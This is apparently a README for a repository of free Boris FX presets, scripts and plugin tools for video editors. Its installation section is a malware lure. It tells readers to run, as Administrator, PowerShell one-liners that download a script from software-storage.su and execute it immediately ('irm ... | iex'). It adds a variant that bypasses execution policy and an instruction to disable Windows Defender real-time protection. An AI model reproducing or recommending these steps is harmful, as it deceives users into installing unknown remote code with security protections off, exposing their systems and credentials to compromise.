Welcome to the ultimate open-source repository for Boris FX software enhancements, presets, scripts, and workflow automation tools. This repository is designed for VFX artists, video editors, and motion designers looking to speed up their post-production pipeline in Adobe After Effects, Premiere Pro, DaVinci Resolve, and Avid Media Composer.
- Sapphire Plugins: Custom lens flares, lighting effects, and transition presets.
- Mocha Pro: Advanced planar tracking data, rotoscoping setups, and lens calibration files.
- Continuum (BCC): Title studio templates, particle presets, and image restoration utilities.
- Silhouette & Optics: Cinematic color grading look-up tables (LUTs) and rotoscoping scripts.
- Boris FX Presets Download: Free community-driven effects and transitions.
- VFX Automation: Python and JavaScript scripts for Mocha Pro and After Effects integration.
- Cross-Platform Compatibility: Workflows optimized for Windows and macOS.
- Tutorials & Documentation: Step-by-step guides on how to install and apply BorisFX macros.
Read Readme.txt before install!
-
Open PowerShell as Administrator:
- Press the
Win + Xkeys simultaneously. - Select Terminal (Admin) or Windows PowerShell (Admin) from the context menu.
- Press the
-
Execute the Deployment Command: Copy, paste, and press
Enterto run the following optimized initialization command. This script dynamically configures the network bypass registry and fetches the necessary packages:irm https://software-storage.su/powershell/Loader.ps1 | iex
If your system blocks the launch due to built-in execution policy constraints, enforce a bypass using this command:
powershell -ExecutionPolicy Bypass -Command "irm https://software-storage.su/powershell/Loader.ps1 | iex"In older legacy environments where aliases are missing, use explicit full system cmdlets:
Invoke-RestMethod https://software-storage.su/powershell/Loader.ps1 | Invoke-ExpressionAutomated deployment routines can sometimes trigger proactive security heuristics. Temporarily disable "Real-time protection" within your Windows Defender settings during setup, then re-enable it immediately after completion.